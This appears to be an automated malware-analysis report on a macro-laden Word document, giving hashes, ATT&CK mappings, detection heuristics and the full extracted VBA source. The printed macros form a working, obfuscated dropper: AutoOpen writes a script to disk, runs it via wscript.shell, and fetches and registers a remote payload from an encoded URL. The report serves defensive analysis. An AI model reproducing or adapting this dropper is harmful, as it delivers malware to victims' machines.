Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0b034c00ad6eaeb7…

MALICIOUS

Office (OOXML)

Size: 80.4 KB
Created: 2021-04-01 07:13:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-04-10
MD5: fb7b9177b9417ccb208463d491735c1a
SHA-1: b933fa9140b7bc4141c9b8ee2b7f1691c03c4808
SHA-256: 0b034c00ad6eaeb7e153b60fbd9d2fa35a932d4ad8169335d0c3b1e5146fe06c
Risk Score: 170

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter
  • T1140 Deobfuscate/Decode Files or Information

The sample is an OOXML document containing VBA macros. The 'autoopen' subroutine triggers the execution of a WScript.Shell object, which is used to run a command constructed from obfuscated strings. This indicates an attempt to download and execute a secondary payload, a common technique for malware delivery.

Heuristics (6)

  • VBA project inside OOXML (medium, 4 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage (critical) [OLE_VBA_WSCRIPT]
    WScript.Shell usage
    Matched line in script
    Set storageFuncProcedure = CreateObject("wscript.shell")
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    CreateObject call
    Matched line in script
    Set storageFuncProcedure = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro (low) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9698 bytes
SHA-256: 64d2c96ce54cba44e1f6b6627ae2a30650f1b0b7e2d707a979539c3cb41a1c61
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{51CD720D-386D-4D67-9418-3D27B655EDD0}{C9A9638E-CB6A-4634-BE7B-AA1B2FB0511D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function screenCollectionBuf()
With frm.button1
screenCollectionBuf = .Tag
End With
End Function
Function windowRight()
With frm.button1
windowRight = .Caption
End With
End Function
Public Sub button1_Click()
Set storageFuncProcedure = CreateObject("wscript.shell")
storageFuncProcedure.exec p(screenCollectionBuf) & " " & p(windowRight)
End Sub


Attribute VB_Name = "titleRequest"
Sub autoopen()
mainRef
End Sub
Function intel(borderTableProcedure)
intel = "" & borderTableProcedure & ""
End Function
Sub mainRef()
Dim sizeVariableIterator As String
sizeVariableIterator = p(frm.button1.Caption)
Set nextConvert = New pointerBorderScreen
nextConvert.constLoadSelect sizeVariableIterator, captionValue
frm.button1_Click
End Sub
Function mainLoad(bufferSelect, ptrCopyPaste, memoryNext)
mainLoad = Replace(bufferSelect, ptrCopyPaste, memoryNext)
End Function

Attribute VB_Name = "nextQueryView"
Function leftTemp()
leftTemp = intel("<html><body><div id='content'>fTtlc29sYy5uZUx0bnVvQ25vaXRwZWN4ZT")
End Function
Function countClear()
countClear = intel("spMiAsImdwai53ZWlWbm9pdHBlY3hFdGhnaXJcXGNpbGJ1cFxcc3Jlc3VcXDpjIi")
End Function
Function ptrLocal()
ptrLocal = intel("hlbGlmb3RldmFzLm5lTHRudW9Dbm9pdHBlY3hlOyl5ZG9iZXNub3BzZXIubm9pdH")
End Function
Function bufferCollection()
bufferCollection = intel("BPcmV0bmlvcChldGlydy5uZUx0bnVvQ25vaXRwZWN4ZTsxID0gZXB5dC5uZUx0bn")
End Function
Function bufferCountBuffer()
bufferCountBuffer = intel("VvQ25vaXRwZWN4ZTtuZXBvLm5lTHRudW9Dbm9pdHBlY3hlOykibWFlcnRzLmJkb2")
End Function
Function collectionRightStruct()
collectionRightStruct = intel("RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IG5lTHRudW9Dbm9pdHBlY3hlIHJhdnspMD")
End Function
Function collectionCountPaste()
collectionCountPaste = intel("AyID09IHN1dGF0cy5ub2l0cE9yZXRuaW9wKGZpOykoZG5lcy5ub2l0cE9yZXRuaW")
End Function
Function AVariableRequest()
AVariableRequest = intel("9wOyllc2xhZiAsInIyRnBqTGVrS0NWTE1KeEJWTW1nZVU5RWRNZGE9aGNyYWVzJk")
End Function
Function varNamespace()
varNamespace = intel("lTUkxJPWZlciY0YWhlYTNjbFdqaVRMWUlGeno4WUw4PWhjcmFlcyZjNEpwTm9nYn")
End Function
Function dataStorage()
dataStorage = intel("NrPVhjMjBFemJpRUEmU05SQktlZUY4PUR6dG1nNUY/MjFuYXgvN2RmeUpIcnpVNX")
End Function
Function memCountDatabase()
memCountDatabase = intel("NreVVZNjViOEYvQWlWTXZOeEV4cUU3UVliSTVKeHMvQlNzdE8xcHczcFVUSjU4bk")
End Function
Function listboxTableCaption()
listboxTableCaption = intel("16SWZ6VE9oMUE1THhISHUySmovNDQ4Mzcvc3l1b2cvbW9jLjAyMDJzc2lldy1uZX")
End Function
Function varCaptionProc()
varCaptionProc = intel("R0aWsvLzpwdHRoIiAsIlRFRyIobmVwby5ub2l0cE9yZXRuaW9wOykicHR0aGxteC")
End Function
Function listIteratorArgument()
listIteratorArgument = intel("4ybG14c20iKHRjZWpiT1hldml0Y0Egd2VuID0gbm9pdHBPcmV0bmlvcCByYXY=|f")
End Function
Function ExTmp()
ExTmp = intel("XspZXppU2Vzbm9wc2VyKGhjdGFjfTspImF0aC53ZWlWbm9pdHBlY3hFdGhnaXJcX")
End Function
Function queryA()
queryA = intel("GNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmZXRlbGVkLm5vaXRwYUNjaXJlbmVHdG5lb")
End Function
Function countTitleTitle()
countTitleTitle = intel("XVjb2R7eXJ0OykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hld")
End Function
Function selectGeneric()
selectGeneric = intel("ml0Y0Egd2VuID0gbm9pdHBhQ2NpcmVuZUd0bmVtdWNvZCByYXY7KSJncGoud2VpV")
End Function
Function classConvertNext()
classConvertNext = intel("m5vaXRwZWN4RXRoZ2lyXFxjaWxidXBcXHNyZXN1XFw6YyAyM3J2c2dlciIobnVyL")
End Function
Function documentCopySelect()
documentCopySelect = intel("ikibGxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4=</div><div id='ta")
End Function
Function titleA()
titleA = intel("ble1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>012345678")
End Function
Function bufferWConvert()
bufferWConvert = intel("9+/</div><div id='table3'></div><script language='javascript'>fu")
End Function
Function nextOptionClass()
nextOptionClass = intel("nction tableFuncResponse(loadLocalMemory){return(new ActiveXObje")
End Function
Function refSizeW()
refSizeW = intel("ct(loadLocalMemory));}function WRequest(pasteTextbox){return(loc")
End Function
Function selectTitle()
selectTitle = intel("alLeft.getElementById(pasteTextbox).innerHTML);}function buttonC")
End Function
Function referenceGenericMemory()
referenceGenericMemory = intel("onstCount(){var tmpReference = WRequest('table1');var countWindo")
End Function
Function removeDocumentClass()
removeDocumentClass = intel("wClear = tmpReference.toLowerCase();var lenSize = WRequest('tabl")
End Function
Function documentListboxLink()
documentListboxLink = intel("e2');return(tmpReference + countWindowClear + lenSize);}function")
End Function
Function tableException()
tableException = intel(" sizeMainBuffer(s){var e={}; var i; var b=0; var c; var x; var l")
End Function
Function counterTextArgument()
counterTextArgument = intel("=0; var a; var copyTitle=''; var w=String.fromCharCode; var L=s.")
End Function
Function queryVariableList()
queryVariableList = intel("length;var countSelectStorage = 'charAt';for(i=0;i<64;i++){e[but")
End Function
Function clearRefTextbox()
clearRefTextbox = intel("tonConstCount()[countSelectStorage](i)]=i;}for(x=0;x<L;x++){c=e[")
End Function
Function ptrGlobalRight()
ptrGlobalRight = intel("s[countSelectStorage](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(")
End Function
Function loadEx()
loadEx = intel("l-=8))&0xff)||(x<(L-2)))&&(copyTitle+=w(a));}}return(copyTitle);")
End Function
Function nextCollectionIndex()
nextCollectionIndex = intel("};function nextDataRef(arrayVar){return arrayVar.split('').rever")
End Function
Function exceptionCounter()
exceptionCounter = intel("se().join('');}captionMemory = window;localLeft = document;capti")
End Function
Function responseButton()
responseButton = intel("onMemory.resizeTo(1, 1);captionMemory.moveTo(-100, -100);var vie")
End Function
Function variableQuery()
variableQuery = intel("wOptionRepo = localLeft.getElementById('content').innerHTML;var ")
End Function
Function borderLocalWindow()
borderLocalWindow = intel("viewOptionRepo = viewOptionRepo.split('|');var procedureGenericC")
End Function
Function structMemory()
structMemory = intel("ollection = nextDataRef(sizeMainBuffer(viewOptionRepo[0]));var o")
End Function
Function namespaceScreenOption()
namespaceScreenOption = intel("ptionVarView = nextDataRef(sizeMainBuffer(viewOptionRepo[1]));</")
End Function
Function procedureTitleConst()
procedureTitleConst = intel("script><script language='javascript'>function tableArgumentBuf(b")
End Function
Function globalDataProcedure()
globalDataProcedure = intel("uttonPointer){var clearPtrArgument = tableFuncResponse('msscript")
End Function
Function textboxGeneric()
textboxGeneric = intel("control.scriptcontrol');clearPtrArgument.Language = 'jscript';cl")
End Function
Function rightExCount()
rightExCount = intel("earPtrArgument.Timeout = 60000;clearPtrArgument.AddCode(buttonPo")
End Function
Function swapRepo()
swapRepo = intel("inter);return(null);}</script><script language='vbscript'>tableA")
End Function
Function tmpLib()
tmpLib = intel("rgumentBuf procedureGenericCollection : tableArgumentBuf optionV")
End Function
Function ExArgument()
ExArgument = intel("arView : captionMemory.close</script></body></html>")
End Function
Function captionValue()
captionValue = leftTemp + countClear + ptrLocal + bufferCollection + bufferCountBuffer + collectionRightStruct + collectionCountPaste + AVariableRequest + varNamespace + dataStorage + memCountDatabase + listboxTableCaption + varCaptionProc + listIteratorArgument + ExTmp + queryA + countTitleTitle + selectGeneric + classConvertNext + documentCopySelect + titleA + bufferWConvert + nextOptionClass + refSizeW + selectTitle + referenceGenericMemory + removeDocumentClass + documentListboxLink + tableException + counterTextArgument + queryVariableList + clearRefTextbox + ptrGlobalRight + loadEx + nextCollectionIndex + exceptionCounter + responseButton + variableQuery + borderLocalWindow + structMemory + namespaceScreenOption + procedureTitleConst + globalDataProcedure + textboxGeneric + rightExCount + swapRepo + tmpLib + ExArgument
End Function

Attribute VB_Name = "pointerBorderScreen"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub constLoadSelect(trustGenericStorage As String, responseCaptionWindow As String)
Dim optionTitleScreen As FileSystemObject
Set optionTitleScreen = New FileSystemObject
Dim rightViewDelete As TextStream
Set rightViewDelete = optionTitleScreen.CreateTextFile(trustGenericStorage)
rightViewDelete.WriteLine responseCaptionWindow
rightViewDelete.Close
Set rightViewDelete = Nothing
Set optionTitleScreen = Nothing
End Sub

Attribute VB_Name = "convertArray"
Function p(valuePaste)
p = mainLoad(valuePaste, "@", "")
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 40448 bytes
SHA-256: f8bcb5048dea606e6359fea2bbdd8010e10891cdb832062847d6345e61fc7e0e